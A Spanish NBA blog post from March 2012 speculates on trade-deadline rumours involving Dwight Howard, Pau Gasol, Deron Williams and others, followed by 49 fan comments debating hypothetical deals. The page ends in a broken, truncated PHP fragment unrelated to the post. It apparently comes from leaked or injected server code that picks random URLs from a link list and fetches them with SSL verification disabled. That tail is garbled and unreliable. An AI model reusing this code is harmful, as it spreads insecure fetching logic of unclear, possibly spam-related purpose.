Rumores antes del día D

10 de March de 2012 por jose a ramirez

Para amenizar la espera previa a la que se supone será una de las fechas límites más intensas en cuanto a traspasos se refiere, con algunos all-star de por medio e interesantes piezas apetecibles para muchos candidatos, nada mejor que echar un vistazo a lo que nos pueden deparar los movimientos y el hipotético potencial con el que algunos equipos pueden entrar en la recta final de la campaña. Como diría el gran Andrés Montes, un poco de “bula bu chau chau”.

Antes de entrar en el ajo, decir que hasta ahora el panorama ha estado muy parado y que parece que los Generals Managers no quieren mover ficha hasta última hora. ¿Será al final para tanto todo lo que se rumorea, o habrá decepciones en más de un seguidor de algún equipo?

Empezamos con los grandes equipos, y como no, el primero debe ser Miami. Sabido es que buscan un pívot, y aunque sonaron Pryzbilla o Kaman, ojo que el que puede estar al caer es el “bad boy” Rasheed Wallace. Ha hecho un entrenamiento privado y parece que es el jugador quien todavía no sabe si volver del retiro o no. Típico de él, no podíamos esperar menos. Sonó Steve Nash tímidamentepero parece que el jugador no pedirá el traspaso de Phoenix. Por su manera de ser y porque está instalado con su familia en Arizona, creo que solo se irá si Phoenix lo mete como canje para darle la oportunidad de ganar el anillo que se merece. Por ejemplo, podría ir a Orlando en un intento de la franquicia para convencer a Dwight Howard que se quede.

El gran protagonista de la rumorología podría salir a New Jersey a cambio de Brook López y quizá Marshon Brooks, aunque la lesión de López puede echar ese traspaso por tierra. Otra opción son los Lakers con Pau y Bynum de moneda de cambio. Parece que esta última opción no termina de convencer ni a unos ni otros. Lo que está claro es que Orlando quiere aprovechar para liberarse del lastre que supone el salario de Turkoglu. También suenan para salir Jameer Nelson y Ryan Anderson aprovechando el gran cartel que tiene este último hoy en día. Quizá los Warriors estén dispuestos a desprenderse de Monta Ellis pero DH12 no quiere ir a Oakland.¡¡ Menudo lío Daimiel¡¡. Lo que está claro,es que para mover a Pau, Howard y demás estrellas, tendrán que haber intercambios entre 3 o hasta 4 equipos para cuadrar salarios. También  hay jugadores que pueden ser traspasados a eplo entre 2 equipos pero lo que necesita uno no lo tiene el otro y viceversa. Cuidado con los traspasos a tres o más bandas, es la única manera de desenroscar muchas situaciones.

En cuanto a Pau Gasol, Kutpach parece que le ha tranquilizado pero yo creo que si ve una buena opción para el equipo saldrá, aunque personalmente lo veo muy difícil porque nadie va a querer tragarse el salario del español. Además hay que tener en cuenta que tiene una clausula por la que si sale traspasado cobraría 3 kilos más. En esas se mueven los Lakers, intentando fichar un buen base aún sabiendo que no será una estrella. Suenan Raymond Felton, Ramon Sessions, Kirk Hinrich y hasta José Calderón. Es inimaginable que los Lakers se queden parados después del ridículo de Odom y visto el rendimiento del equipo. Veremos como lo solucionan o lo parchean más bien.

Deron Williams es otro de los nombres propios del mercado. Suena para Orlando como algo gordo para juntar con Howard pero personalmente creo que Cuban lo tiene atado para Dallas el año que viene y que a él se le sumara Superman. ¿Aguantarán pues los 2 en sus actuales equipos más allá del 15 de Marzo? Solo en pensar tantas posibilidades ahora mismo da mareo.

Eso es lo que tiene que sentir Jamal Crawford en Portland. Sus desavenencias con McMillan son más que evidentes ya y ojo que Indiana, Timberwolves y Clippers quieren apostar sobre seguro. Minnesota es el que más puede ofrecer y le hace falta un escolta. Barea, Ridnour, Beasley y hasta Derrick Williams son caramelos que otros equipos no pueden igualar. Si les falla eso, pueden ir a por Kevin Martin que siempre ha sido un favorito de Adelman. Suena Pau (como no) pero parece que lo que llegaría de L.A a cambio, Beasley y Williams, no convence. Cuidado, que Minesotta puede dar un paso muy grande con algún traspaso. Clippers también necesita un escolta como el comer, y aparte de Crawford suena Ray Allen.

Y así llegamos a Boston. Con Rondo ya confirmado (parece mentira), los intentos de Ainge pueden depender de los resultados. Se ha insinuado una revolución y aparte de Rondo, sonó el “big three” entero. Paul Pierce es quien más cartel tiene pero es un símbolo. Si sale alguien será Allen. Monta Ellis es objetivo de los Celtics pero no creo que la revolución se llegue a dar. Lo que sí buscarán será un pívot. ¿Chris Kaman tal vez? Será muy interesante ver en que dirección se mueve Ainge.

Atlanta parece que de una vez por todas quiere darle un lavado de cara a una plantilla estancada desde hace años y quieren colocar a “Jo-Jo”. Los Warriors pueden picar. El “Suave” Smith es otro que quiere salir de allí y novias no le van a faltar. Orlando, Boston, Lakers… y sigue contando y no pares de contar. Por su parte, Chicago podría darle salida a Carlos Boozer pero ¿quién lo querría y cambio de qué?.

De Detroit e Indiana no se habla mucho pero cuidado que pueden salir Tayshaun Prince y Danny Granger y ser los tapados del mercado. En Denver veremos cuando vuelve Wilson Chandler y Dallas puede acabar reduciendo más su masa salarial y prescindir de Odom o Marion. Warriors quiere un pívot como sea, Houston no abandona la idea de Pau Gasol pero sin desprenderse nunca de Kyle Lowry y, por último, Charlotte parece que no le quiere dar el buy outBoris Diaw antes del 15 pero luego es muy probable que lo hagan si no han conseguido sacar algo a cambio. El francés puede ser una pieza interesante para algún aspirante y seguro que muchos llamarán por él. No me olvido de Utah y su ansia por desprenderse de Devin Harris, e incluso de alguien del juego interior.

Y hasta aquí esta entrega de rumores, suposiciones y demás. Veremos en que acaba todo esto. Intentaré ir informando cada pocos días de los últimos movimientos y se agradece que aportéis más nombres o posibilidades con las que podamos comentar todos y al final veamos que equipos nos encontramos en la liga el 16 de marzo.

Lo único que está claro de toda esta locura es que nuestras mentes echarán el mismo humo con tantas cavilaciones como los teléfonos de los jefazos de los despachos. Esperemos que al final la cosa se anime como promete mínimo. Gracias a todos por leer este mi primer articulo para tjnba.

Comenta

49 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Muy buen post Jose Antonio, y muy completo, me ha gustado mucho. Bien escrito y redactado, genial. Mi más sincera enhorabuena.

      Citar

  2. Blade Petrovic dice:
    #2

    Pau en todo caso como ya se dijo aqui a los Buuls por Boozer y CJ Watson y los Lakers se quedan peor Beat LA y los Bulls y Pau mejor y ganan más opciones para el anillo.

      Citar

  3. Sancho88 dice:
    #3

    Cojonudo artículo, así da gusto. Lo de Kevin Martin a los Wolves, personalmente yo lo veo. Adelman lo tuvo en los Kings, y está claro que sería un equipo ideal para Martin, con la confianza plena del entrenador. De 20 puntos por noche no bajaría ni de coña. Lo dicho, hasta el jueves estaremos todos espectantes, porque el volcán está echando humo, y después de eso dicen que sale la lava a borbotones… si tuviera que apostar por un multitraspaso a 3-4 bandas, creo que sería el de Dwight Howard. Veremos a qué equipos, y con qué implicados. Yo apuesto porque Howard se pira de Orlando (no sé a donde, ni a cambio de qué, pero apuesto porque acaba en Warriors por Monta Ellis+Biedrins podría ser), Pau llega a Orlando, y Nelson, JJ y Anderson acaban en Lakers. No va a ocurrir, pero creo que por ahí van los tiros, por un multitraspaso de estos to chungos

      Citar

  4. Denise dice:
    #4

    El traspaso que se comenta de Howard a NY a cambio de Brooks y Lopez es inviable. Primero porque los Magic no la aceptarían, y segundo porque descuadra mucho en el salario (mas de 12 millones) por lo que NY tendría que dar posiblemente tambien a Humphries y a Morrow.

    Y Sancho, no creo que Orlando vaya a dar 2 titulares y aun 6º hombre por Pau Gasol, es demasiado, sería un timo. Le das a Lakers un pedazo de base como Nelson, un gran tirador aunque irregular, pero en definitiva buen jugador como Redick, y un fenomenal 4 como Anderson por un crack como Pau, pero de 32 años y con un contratazo a las espaldas. No sé, creo que es un timo. Las opciones de Lakers a anillo se dispararían mientras que Orlando acabaría jugando con el utillero.

    Y personalmente, si Howard debe marcharse a GSW, mas que un Ellis y Biedrins, preferiria un Curry + David Lee + Klay Thompson (este rookie es muy bueno, me encanta)

      Citar

  5. Denise dice:
    #5

    Si Pau y Nash no se mueven antes del Deadline, creeis que en el verano, si los Heat consiguen fichar a Nash por la Mid-Level, podriamos ver un Chalmers + Bosh por Pau?

    Sería un puntazo ver un Nash-Wade-Lebron-Pau-y un 5

      Citar

  6. Sancho88 dice:
    #6

    Denise:
    El traspaso que se comenta de Howard a NY a cambio de Brooks y Lopez es inviable. Primero porque los Magic no la aceptarían, y segundo porque descuadra mucho en el salario (mas de 12 millones) por lo que NY tendría que dar posiblemente tambien a Humphries y a Morrow.

    Y Sancho, no creo que Orlando vaya a dar 2 titulares y aun 6º hombre por Pau Gasol, es demasiado, sería un timo. Le das a Lakers un pedazo de base como Nelson, un gran tirador aunque irregular, pero en definitiva buen jugador como Redick, y un fenomenal 4 como Anderson por un crack como Pau, pero de 32 años y con un contratazo a las espaldas. No sé, creo que es un timo. Las opciones de Lakers a anillo se dispararían mientras que Orlando acabaría jugando con el utillero.

    Y personalmente, si Howard debe marcharse a GSW, mas que un Ellis y Biedrins, preferiria un Curry + David Lee + Klay Thompson (este rookie es muy bueno, me encanta)

    Denise, a Curry-Thompson-Lee, no creo que los suelten, aunque Lee tiene un contrato alto que para cuadrar lo de Howard podría valer. Howard solo se moverá a un equipo con el que se comprometa a renovar, obviamente. Si a cambio de Howard puedes obtener a Ellis+Pau, aunque pierdas a JJ, Anderson y Nelson… fíjate que liberarían mucho salario y podrían cazar este verano. Sinceramente, prefieres eso, o que os quedéis sin Howard a cambio de nada? pues yo prefiero Ellis+Gasol, más mucho espacio en el límite salarial para poder maniobrar. Date cuenta, JJ vs. Ellis? No hay color. Anderson vs. Pau? No hay color. Y Nelson, cobrando 7 kilos al año… personalmente, me parecerían muy jugosos para ir a por Calde, Nash, etc. Creo que sin Howard, el resto de los Magic no tendría sentido, así que os vendría muy bien renovar de arriba a abajo. Es solo mi opinión, y que conste que lo digo para que el equipo mejore. No me gustaría ver a los Magic arrastrándose sin Howard…

      Citar

  7. rumbero dice:
    #7

    Denise: Si Pau y Nash no se mueven antes del Deadline, creeis que en el verano, si los Heat consiguen fichar a Nash por la Mid-Level, podriamos ver un Chalmers + Bosh por Pau?Sería un puntazo ver un Nash-Wade-Lebron-Pau-y un 5

    Madre mia, con ese equipo podría jugar yo y mi 1,75m de 5 y no se notaría…aunque bueno, Joel Anthony no creo que mejorara mucho mis prestaciones xD
    Yo estoy con Jose y creo que Cuban ya está moviendo los hilos para llevarse a Deron y Dwight para Dallas, aunque personalmente me gustaría ver un baile de trade entre 4-5 equipos que siempre da más vidilla a esto. A ver si alguien (Lakers?) lanza una oferta suculenta y empieza a moverse todo…
    PD: Estoy con Sancho, un Kevin Martin en Wolves lo petaría

      Citar

  8. jose antonio ramirez dice:
    #8

    Me alegro muchisimo que os haya gustado, para el lunes espero actualizarlo que ya hay algunos rumores circulando por ahi que a la hora de redactar este no estaban. Seguid atentos

      Citar

  9. Vader dice:
    #9

    Lastima de lesión de Ricky, entre 6 y 9 meses dicen… una faena. Le quita mucho potencial a los Wolves de cara a playoff y desde luego adios a cualquier esperanza de RoY para Ricky.

    Sobre los traspasos yo no tengo tan claro que haya muchos. Dicen que siendo una temporada tan corta la mayoria de general managers preferiran acabar la temporada sin tocar mucho y esperar al draft para hacer los movimientos oportunos. Veremos.

    Saludos y gran artículo!!

      Citar

  10. Sancho88 dice:
    #10

    Jonny Flynn on court. Esto es bestial!!

      Citar

  11. melo15 dice:
    #11

    Vader, el rookie esta claro que sera para Irving, que esta jugando mejor que Ricky.
    Sancho, es verdad que Flynn juega??

      Citar

  12. Denise dice:
    #12

    Sancho88: Denise, a Curry-Thompson-Lee, no creo que los suelten, aunque Lee tiene un contrato alto que para cuadrar lo de Howard podría valer. Howard solo se moverá a un equipo con el que se comprometa a renovar, obviamente. Si a cambio de Howard puedes obtener a Ellis+Pau, aunque pierdas a JJ, Anderson y Nelson… fíjate que liberarían mucho salario y podrían cazar este verano. Sinceramente, prefieres eso, o que os quedéis sin Howard a cambio de nada? pues yo prefiero Ellis+Gasol, más mucho espacio en el límite salarial para poder maniobrar. Date cuenta, JJ vs. Ellis? No hay color. Anderson vs. Pau? No hay color. Y Nelson, cobrando 7 kilos al año… personalmente, me parecerían muy jugosos para ir a por Calde, Nash, etc. Creo que sin Howard, el resto de los Magic no tendría sentido, así que os vendría muy bien renovar de arriba a abajo. Es solo mi opinión, y que conste que lo digo para que el equipo mejore. No me gustaría ver a los Magic arrastrándose sin Howard…

    Si, pero es que con el traspaso que propones, te quedaria una plantilla cortisima y descompensada, te quedarias con Monta Ellis-J Rich, Turkoglu, Pau y Glen Davis en el 5 inicial, con Duhon, Quentin, Wafer, Clark y Biedrins (paqueton con un contratazo de 9 kilos).
    La verdad es que yo, preffiero quedarme sin nada a cambio antes que regalarle a Howard a alguien. Al menos si no lo traspasas ahora, tienes mas % de que renueve, ya que algunos equipos como Lakers, Bulls o Hawks no pueden pujar por él si es agente libre.
    La cosa quedaría entre Magic, Nets, Mavericks y Celtics.

      Citar

  13. Denise dice:
    #13

    ¿Y si los Magic se hiciesen con Pau para intentar retener a Howard? Podrían ofrecer a Lakers por Pau y Blake un Turkoglu-Ryan Anderson+Nelson.
    Sería beneficioso para ambos, a Lakers le quedaría un Nelson-Kobe-Turkoglu-Anderson-Bynum de 5 inicial, mucho mejor que el que tienen ahora.
    Y para los Magic, sería un puntazo acabar el año con una pareja interior Pau-Howard que podría hacer que Superman renovase y atraer a agentes libres como Nash o Ray Allen en verano.

      Citar

  14. Viva_Dirk dice:
    #14

    Dudo que Howard se quede en Orlando de ninguna de las maneras, con ese último traspaso que dice Denise a los Magics les quedaría un equipo cortísimo y sin margen de maniobra con esos agentes libres que nombras.

    No seria un traspaso que me entusiasmara para Lakers, pero mal tampoco lo veria.

      Citar

  15. JoeJohnson dice:
    #15

    alguien sabe algo de JoJo?
    dificil que alguien se quiera comer semejante contrato

      Citar

  16. MagicJohnson32 dice:
    #16

    JoeJohnson:
    alguien sabe algo de JoJo?
    dificil que alguien se quiera comer semejante contrato

    Inviable. Además, con la demanda de traspaso de Josh Smith supongo que toda la actividad negociadora en los Hawks girará en torno a Smooth, quien, por cierto, tampoco creo que salga.

      Citar

  17. Alejandronba dice:
    #17

    Todo un éxito tu artículo Jose jejejeje , yo creo que al final los grandes nombres no aparecerán en ningun traspaso aunque si que habrá muchos movimientos para retocar piezas en los equipos que quieran aspirar realmente al anillo .¿ Ficharan los Lakers al final a Felton? seria el base ideal para el equipo .

      Citar

  18. Cocinitas dice:
    #18

    El último rumor que circula con fuerza es que los Bulls ofrecen a Boozer, Asik y Deng a cambio de Howard y Turkoglu. Bajo mi punto de vista perderian los Bulls.

      Citar

  19. Vader dice:
    #19

    JoeJohnson:
    alguien sabe algo de JoJo?
    dificil que alguien se quiera comer semejante contrato

    Jojo + Smith por Stat + Melo?

    🙂

      Citar

  20. nba dice:
    #20

    Deng deberia ser intransferible para los Bulls, salvo que en el trade viniese alguien llamado Jordan.
    Por otro lado parece que con la ultima racha de lesiones el tema de los trades se va a quedar en agua de borrajas

      Citar

  21. Denise dice:
    #21

    Cocinitas: El último rumor que circula con fuerza es que los Bulls ofrecen a Boozer, Asik y Deng a cambio de Howard y Turkoglu. Bajo mi punto de vista perderian los Bulls.

    Ese trade es un insulto a los Magic, vaya dos contratazos los de Boozer y Deng. Desde la perspectiva de Orlando, lo rechazaría sin pensarmelo. Prefiero quedarme sin nada a cambio y reconstruir antes que asumir el abusivo y desproporcionado contrato de estos 2.

      Citar

  22. Ru dice:
    #22

    Dado que Josh Smith está pidiendo un traspaso y que los Lakers piden un “AllStar” a cambio de Pau,porqué no se encuentran y cambian cromos,Blake + Pau por J.Smith + Hinrich,el traspaso cuadra.Además tendría el efecto anecdótico de que Pau jugaría en el equipo que lo seleccionó en el draft de 2001,jeje.

    Ha sonado también por el de Atlanta,Jamison + Sessions de forma que recalaría en Cleveland.Sería una buena forma de mediáticamente llamar la atención para los Cavs,juntándolo a Irving pero dudo mucho que sea un destino idílico para JS.

      Citar

  23. Jose Luis dice:
    #23

    Sessions sí que no encaja en Hawks con Hinrich y Teague. Y Jamison no resuelve nada a Atlanta. Es que estos con el contrato de JJ, tienen que ir por el título o PO sí o sí, no pueden reconstruir ahora. Qué gran error extenderle ese contrato dios mío. Podían haber dejado que se fuera y pillar otro jugador, Jordan Crawford en los Hawks creo que hubiera evolucionado mejor. Aún así también les haría falta un alero, porque Williams no es lo más, pero bueno, cumple, y creo que quedaría un buen equipo para ir entrando en PO, pero poco más claro, aunque al menos no pagarían ese pastizal a JoJo.

      Citar

  24. simon dice:
    #24

    nba:
    Deng deberia ser intransferible para los Bulls, salvo que en el trade viniese alguien llamado Jordan.
    Por otro lado parece que con la ultima racha de lesiones el tema de los trades se va a quedar en agua de borrajas

    Deng por Deandre Jordan te vale??? jajaja

      Citar

  25. Vader dice:
    #25

    simon: Deng por Deandre Jordan te vale??? jajaja

    ¿Jordan Crawford?

    🙂

    Luego en casa escribo sobre los Knicks en el otro hilo…

      Citar

  26. MagicJohnson32 dice:
    #26

    Suena un DJ Augustin por Crawford. Supongo que, de hacerse, Felton haría las maletas.

      Citar

  27. nba dice:
    #27

    Yo creo que Felton ya las tiene hechas, lo que pasa es que todavia no sabe el destino , jeje.
    Viendo que parece que los trade estan en calma-chicha , cada vez veo mejor un trade Lakers-Warrios, Pau-Ellis + algo , viendo que en ataque Pau apenas tiene balones , igual a los Lakers le vendrian bien Ellis como 6º hombre ,igual que hacen los Thunder con Harden, y llegado el momento que tomase el relevo de Bryant, aunque el jugador franquicia en el futuro tiene toda la pinta que sera Bynum

      Citar

  28. MagicJohnson32 dice:
    #28

    Ahora se habla de unas negociaciones a tres bandas, Warriors, Magic, Hornets. Monta iría a los Magic junto a Biedrins y Dorrell Wright. Orlando daría a Anderson, Turkoglu, Redick y Q-Rich. De los Hornets saldría al menos Kaman.

      Citar

  29. Denise dice:
    #29

    MagicJohnson32:
    Ahora se habla de unas negociaciones a tres bandas, Warriors, Magic, Hornets. Monta iría a los Magic junto a Biedrins y Dorrell Wright. Orlando daría a Anderson, Turkoglu, Redick y Q-Rich. De los Hornets saldría al menos Kaman.

    No lo creo. Sería absurdo para Orlando. Dorrell parece el tipico tio que tuvo un año bueno y ahí se acabó…Biedrins?? es una broma.

      Citar

  30. melo15 dice:
    #30

    Bueno Denise, pues que Trade te gustaria, a todos nos dices que no

      Citar

  31. MagicJohnson32 dice:
    #31

    Otro rumor: Jamal Crawford a los Clippers a cambio de Eric Bledsoe y Ryan Gomes.

      Citar

  32. HeiNeKeN dice:
    #32

    MagicJohnson32:
    Otro rumor: Jamal Crawford a los Clippers a cambio de Eric Bledsoe y Ryan Gomes.

    Supongo que lo ofrecen los Clippers, porque como el que lo ofrezca sea Portland es para que los Clippers acepten de cabeza

      Citar

  33. melo15 dice:
    #33

    Vaya tokomochazo!
    Lin por Felton y J.R smith por Lou Williams

      Citar

  34. MagicJohnson32 dice:
    #34

    melo15:
    Vaya tokomochazo!
    Lin por Felton y J.R smith por Lou Williams

    Lo de Lin por Felton no lo harían los Knicks por motivos económicos, y lo de JR por Lou no lo harían los Sixers porque no son tontos. Además, los NYK no pueden traspasar a JR.

    Seguimos con los Blazers: dicen que estarían interesados en Felton por Steve Blake.

      Citar

  35. MagicJohnson32 dice:
    #35

    Y los Warriors van tras Bogut.

      Citar

  36. Sancho88 dice:
    #36

    Al parecer, los Knicks dejarían a Bibby irse libre al club que él quisiera, si es que hay algún interesado. Solamente por el impacto que tuvo en Sacramento, y porque fue el jugador que guió a los Kings a sus últimos playoffs, allá por 2006-2007, estaría bien verle de nuevo con la camiseta morada. Lo que pasa es que no tendría sentido su vuelta, pero me imagino al público ovacionándole, y al tipo con la camiseta que le hizo ser all-star, y se me ponen los pelos de gallina. Igual se pondría a jugar bien y todo, aunque parece altamente improbable… además, no sé si el tipo cobra 6 millones al año, o algo parecido…

      Citar

  37. Denise dice:
    #37

    melo15:
    Bueno Denise, pues que Trade te gustaria, a todos nos dices que no

    Stephen Curry, Klay Thompson, David Lee y Biedrins (paquetazo de 9 kilos) por Glen Davis, Ryan Anderson y Turkoglu, Jameer Nelson o JJ Redick.

      Citar

  38. Denise dice:
    #38

    Denise: Stephen Curry, Klay Thompson, David Lee y Biedrins (paquetazo de 9 kilos) por Glen Davis, Ryan Anderson y Turkoglu, Jameer Nelson o JJ Redick.

    Bueno…pensandolo en frio, creo que es un timo a GSW, improbable que se produzca. Pero Lee, Curry y Thompson son jugadores que me gustan mucho.

      Citar

  39. melo15 dice:
    #39

    Pues te puede gustar mucho Klay Thompson, pero los Warriors tendrian que haber escogido a Kawhi Leonard, lo necesitaban mucho mas, y despues esta Udoh, el tio no es malo, pero tampoco lo necesitan con Lee, tendrian que haber escogido a Monroe, aunque cuando esta libre Al Jefferson, si los Warriors lo escogen, podrian clasificarse a playoffs

      Citar

  40. Nacho dice:
    #40

    Leyendo sobre rumores, hay un movimiento de los Nets, que puede ser interesante si se implican los Lakers. Sobre todo para la futura franquicia de Brookling. Hombre, es un absurdo pero viendo al GM angelino te lo esperas todo.
    Si los Nets se hacen con Diaw, como parece, expiring de 9 kilos, podrían traspasarlo a LA junto con Humphries por Pau. En LA se hacen con un cuatro mediático, no tan bueno, liberan los 9 kilos de Diaw y a buscar FA en verano. Sería una cagada claro, pero su juego interior tampoco se resentiría mucho mucho, por lo menos en intensidad.
    En casa del ruso tendrían a Deron y Pau para terminar el año, y esperar a Howard en verano. Además kirilenko llegará allí, sin duda. Puede bajar su caché que los rusos por debajo a los suyos le dan lo que sea.
    Deron-Brooks-Kirilenko-Pau-Howard, no suena mal. Lo que no sé es si cuadran los salarios, pero vamos, como que el impuesto de lujo no le va a preocupar, sobre todo con ese cinco que puede aspirar a casi todo.

      Citar

  41. Denise dice:
    #41

    Nacho: Leyendo sobre rumores, hay un movimiento de los Nets, que puede ser interesante si se implican los Lakers. Sobre todo para la futura franquicia de Brookling. Hombre, es un absurdo pero viendo al GM angelino te lo esperas todo.Si los Nets se hacen con Diaw, como parece, expiring de 9 kilos, podrían traspasarlo a LA junto con Humphries por Pau. En LA se hacen con un cuatro mediático, no tan bueno, liberan los 9 kilos de Diaw y a buscar FA en verano. Sería una cagada claro, pero su juego interior tampoco se resentiría mucho mucho, por lo menos en intensidad.En casa del ruso tendrían a Deron y Pau para terminar el año, y esperar a Howard en verano. Además kirilenko llegará allí, sin duda. Puede bajar su caché que los rusos por debajo a los suyos le dan lo que sea.Deron-Brooks-Kirilenko-Pau-Howard, no suena mal. Lo que no sé es si cuadran los salarios, pero vamos, como que el impuesto de lujo no le va a preocupar, sobre todo con ese cinco que puede aspirar a casi todo.

    Jo, pues sería un Big 3 mejor que el de Miami, el 5 inicial tambien mejor, y con ese equipo siempre habría agentes libres que se apuntarian al carro buscando el anillo por poco dinero. Lo malo es que se tienen que cumplir demasiadas combinaciones y condicionales, y que el GM de Lakers sería tonto permitiendo que Pau se vaya a Nets, sabiendo que eso implicaría la renovación automática de Deron y el desembarco de Howard en Brooklyn en verano. Sería dar la llave para que se monte otro super Big 3 en el Este.

      Citar

  42. Sancho88 dice:
    #42

    Como diría el padre nuestro, hágase tu voluntad, así en los despachos como en las canchas, Nacho. Me encanta el trade. Todos saldrían contentos de esa jugada, aunque supongo que Lakers intentarían despacharse a Diaw para no pagar sus 9 kilos con el nuevo impuesto de lujo en tres años. A los Brooklyn Nets les quedaría algo super wapo, un tanto misceláneo, juntando a jugadores que no me casan, pero que tiene mucho sentido como operación

      Citar

  43. simon dice:
    #43

    pero si los Lakers no han aceptado dragic, martin y scola por Pau que os hace pensar que aceptaran un Diaw, Humpries por Pau?

      Citar

  44. nba dice:
    #44

    yo creo que los Lakers tienen que poner toda la carne en el asador para fichar a Rondo, tienen que hacer lo que sea necesario ya que es el unico tipo de base que puede aportar cosas sin solapar ni quitar tiros a Bryant.
    Y los Celtics, al año que viene seguro que pueden pujar por Deron o Nash, es lo que tienen las franquicias historicas y al menos teniendo un entrenador como D. Rivers será un lugar interesante para los agentes libres, ya que este año hagan lo que hagan , en el Este la final sera Bulls-Heat.

      Citar

  45. simon dice:
    #45

    De todas formas yo es que veo claro que Deron y Howard se juntan el año que viene en Dallas, no se es una sensación que tengo desde hace tiempo. lo que no se es si salarialmente es posible, pero el hecho de que Howard haya vetado algun traspaso que otro y se haya negado a ser traspasado a ciertos equipos… Se dice que tambien quiere los Nets pero no se, supongo que será como segunda opción pq si no los Magic ya hubieran aceptado un Lopez + algo por el, no pq sea la mejor oferta que han recibido si no pq Howard ya habría presionado en ese sentido, sin embargo para ir a los Mavs si necesita que sea en verano pues aun sabiendo que se va a ir en verano los Magic no iban a aceptar ni locos un Haywood+marion o Odom por el. ni de coña

      Citar

  46. simon dice:
    #46

    simon:
    De todas formas yo es que veo claro que Deron y Howard se juntan el año que viene en Dallas, no se esuna sensación que tengo desde hace tiempo. lo que no se es si salarialmente es posible, pero el hecho de que Howard haya vetado algun traspaso que otro y se haya negado a ser traspasado a ciertos equipos… Se dice que tambien quiere los Nets pero no se, supongo que será como segunda opción pq si no los Magic ya hubieran aceptado un Lopez + algo por el, no pq sea la mejor oferta que han recibido si no pq Howard ya habría presionado en ese sentido, sin embargo para ir a los Mavs si necesita que sea en verano pues aun sabiendo que se va a ir en verano los Magic no iban a aceptar ni locos un Haywood+marion o Odom por el. ni de coña

    de todas formas esto es por pura intuición y sensación pq creo que los mavs no van a tener sitio para los dos via FA, tendrían que hacer un trade y no tienen nadie atractivo excepto quizás Beaubois pero eso no es suficiente para traer a nadie.

      Citar

  47. Ru dice:
    #47

    simon: de todas formas esto es por pura intuición y sensación pq creo que los mavs no van a tener sitio para los dos via FA, tendrían que hacer un trade y no tienen nadie atractivo excepto quizás Beaubois pero eso no es suficiente para traer a nadie.

    Sin ejercer la Team Option de Odom se quedan en 40 millones aproximadante,no les daría…yo creo que Howard se va a Brooklynn,dudo muchísimo que un proyecto tan ambicioso nazca de una forma tan pobre -presuponiendo la no llegada de Howard y la marcha de Deron-.

    Portland,Orlando para intentar convencer a Howard y Knicks están obligados a hacer algo…al final no se va a mover nada!

      Citar

  48. Denise dice:
    #48

    Pero los Nets lo están haciendo muy bien por el siguiente motivo:

    – Imaginaos que ofrecen a Orlando lo mas apetecible que tienen: Humphries (expiring), Lopez, Morrow y Brooks y Orlando acepta. Conseguirian a Howard pero se tienen que desprender de todos esos jugadores.

    En cambio, para ellos creo que es mejor no ofrecer nada ahora, esperar al verano a que con algo de suerte Deron y Prokhorov muevan hilos para que Superman se vaya a Nets, y asi consiguen a Howard, pero manteniendo a Morrow, Brooks y Lopez, los cuales son buenos activos ya sea para jugar en el equipo o para utilizarlos como monedas de cambio por otro gran jugador (especialmente Brook Lopez)

      Citar

  49. simon dice:
    #49

    Denise:
    Pero los Nets lo están haciendo muy bien por el siguiente motivo:

    – Imaginaos que ofrecen a Orlando lo mas apetecible que tienen: Humphries (expiring), Lopez, Morrow y Brooks y Orlando acepta. Conseguirian a Howard pero se tienen que desprender de todos esos jugadores.

    En cambio, para ellos creo que es mejor no ofrecer nada ahora, esperar al verano a que con algo de suerte Deron y Prokhorov muevan hilos para que Superman se vaya a Nets, y asi consiguen a Howard, pero manteniendo a Morrow, Brooks y Lopez, los cuales son buenos activos ya sea para jugar en el equipo o para utilizarlos como monedas de cambio por otro gran jugador (especialmente Brook Lopez)

    Hombre eso está claro, si tienen la certeza de que Howard quiere ir para alla. lo mejor es esperar al mercado de agentes libres.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>